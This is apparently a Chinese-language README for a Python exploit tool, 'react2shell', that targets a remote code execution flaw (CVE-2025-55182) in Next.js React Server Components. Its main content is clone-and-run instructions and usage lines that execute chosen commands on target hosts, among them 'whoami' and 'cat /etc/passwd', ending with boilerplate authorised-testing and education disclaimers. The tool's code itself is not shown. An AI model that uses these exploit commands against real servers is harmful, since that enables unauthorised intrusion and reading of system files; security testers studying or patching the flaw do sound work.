用于 Next.js React 服务器组件 RCE 漏洞的 Python 利用工具,支持 HTTP/HTTPS。
# 克隆并运行
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<command>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
仅限授权的安全测试使用。
仅可在您拥有或明确授权测试的系统上使用。严禁用于非法活动。
child_process.execSync() 触发 RCEMIT 许可证 - 详见 LICENSE 文件
免责声明:仅用于教育目的。请始终获取适当授权。
最后更新:2025年2月8日
版本:2.0.0
维护者:BrianLopezM99